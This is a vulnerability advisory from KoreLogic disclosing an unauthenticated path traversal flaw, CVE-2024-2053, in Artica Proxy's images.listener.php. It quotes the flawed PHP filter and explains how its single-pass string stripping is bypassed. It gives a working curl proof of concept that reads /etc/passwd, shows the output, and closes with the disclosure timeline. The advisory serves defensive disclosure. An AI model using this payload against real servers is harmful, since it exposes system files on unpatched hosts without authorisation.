Affected Systems
Discovered By
Vulnerability Details
Vulnerability Description
The Artica Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the “www-data” user.
Technical Description
Prior to authentication, a user can send an HTTP request to
the images.listener.php endpoint. This endpoint processes
the mailattach query parameter and concatenates the user
supplied value to the /opt/artica/share/www/attachments/
file path. The contents of the file located at the newly
created path is returned in the HTTP response body.
The images.listener.php endpoint attempts to prevent
a local file inclusion vulnerability by stripping strings
that attempt to traverse into the parent directory from
the user supplied mailattach value:
$_GET["mailattach"]=str_replace("////","/",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("///","/",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("//","/",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("../","",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("/etc/","",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("passwd","",$_GET["mailattach"]);
$file="/opt/artica/share/www/attachments/{$_GET["mailattach"]}";
header("Content-type: application/force-download" );
header("Content-Disposition: attachment; \
filename=\"{$_GET["mailattach"]}\"");
header("Content-Length: ".filesize($file)."" );
header("Expires: 0" );
readfile($file);If effective, this approach would limit files
accessible by this endpoint to those within the
“/opt/artica/share/www/attachments/” directory. Unfortunately,
the removal of the ../ string is only performed once, so
the resulting file path is not checked. By using the path
..././foo.txt, the images.listener.php endpoint removes the
../ string resulting in ../foo.txt - a relative file path
to traverse to the parent directory.
The strings “/etc/” and “passwd” are also stripped from the file path as many methods of detecting a path traversal vulnerability rely on fetching the “/etc/passwd” file. By inserting these strings into specific locations, a user suppplied “mailattach” value such as “/epasswdtc/ppasswdasswd” is transformed into “/etc/passwd”, bypassing the protection entirely.
An unauthenticated user can leverage this endpoint to read files on the system, according to the privileges of the “www-data” user.
Mitigation and Remediation Recommendation
No response from vendor; no remediation available.
Credit
This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc.
Proof of Concept
$ curl -k 'https://192.168.2.129:9000/images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false
quagga:x:106:114:Quagga routing suite,,,:/run/quagga/:/usr/sbin/nologin
apt-mirror:x:107:115::/var/spool/apt-mirror:/bin/sh
privoxy:x:108:65534::/etc/privoxy:/usr/sbin/nologin
ntp:x:109:117::/nonexistent:/usr/sbin/nologin
redsocks:x:110:118::/var/run/redsocks:/usr/sbin/nologin
prads:x:111:120::/home/prads:/usr/sbin/nologin
freerad:x:112:121::/etc/freeradius:/usr/sbin/nologin
vnstat:x:113:122:vnstat daemon,,,:/var/lib/vnstat:/usr/sbin/nologin
stunnel4:x:114:123::/var/run/stunnel4:/usr/sbin/nologin
sshd:x:115:65534::/run/sshd:/usr/sbin/nologin
vde2-net:x:116:124::/var/run/vde2:/usr/sbin/nologin
memcache:x:117:125:Memcached,,,:/nonexistent:/bin/false
davfs2:x:118:126::/var/cache/davfs2:/usr/sbin/nologin
ziproxy:x:119:127::/var/run/ziproxy:/usr/sbin/nologin
proftpd:x:120:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:121:65534::/srv/ftp:/usr/sbin/nologin
mosquitto:x:122:128::/var/lib/mosquitto:/usr/sbin/nologin
openldap:x:123:129:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
munin:x:124:130:munin application user,,,:/var/lib/munin:/usr/sbin/nologin
msmtp:x:125:131::/var/lib/msmtp:/usr/sbin/nologin
Debian-snmp:x:126:132::/var/lib/snmp:/bin/false
opendkim:x:127:133::/var/run/opendkim:/usr/sbin/nologin
avahi:x:128:134:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
glances:x:129:135::/var/lib/glances:/usr/sbin/nologin
ArticaStats:x:1000:1000:ArticaStats:/home/ArticaStats:/bin/bash
Debian-exim:x:130:138::/var/spool/exim4:/usr/sbin/nologin
smokeping:x:131:139:SmokePing daemon,,,:/var/lib/smokeping:/usr/sbin/nologin
debian-spamd:x:132:140::/var/lib/spamassassin:/bin/sh
netdata:x:1001:1002:netdata:/home/netdata:/bin/bash
postfix:x:1002:1001::/home/postfix:/bin/sh
...
...The contents of this advisory are copyright(c) 2024 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
Disclosure Timeline
KoreLogic requests vulnerability contact and secure communication method from Artica.
Artica Support issues automated ticket #1703011342 promising follow-up from a human.
KoreLogic again requests vulnerability contact and secure communication method from Artica.
KoreLogic mail daemon receives SMTP 554 5.7.1 from mail.articatech.com with response "Client host rejected: Go Away!"
KoreLogic requests vulnerability contact and secure communication method via https://www.articatech.com/ 'Contact Us' web form.
KoreLogic requests CVE from MITRE.
MITRE issues automated ticket #1591692 promising follow-up from a human.
30 business days have elapsed since KoreLogic attempted to contact the vendor.
KoreLogic requests update on CVE from MITRE.
KoreLogic requests update on CVE from MITRE.
KoreLogic reaches out to alternate CNA for CVE identifiers.
45 business days have elapsed since KoreLogic attempted to contact the vendor.
Vulnerability details presented to AHA! (takeonme.org) by proxy.
AHA! issues CVE-2024-2053 to track this vulnerability.
KoreLogic public disclosure.
Responsible Disclosure
KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.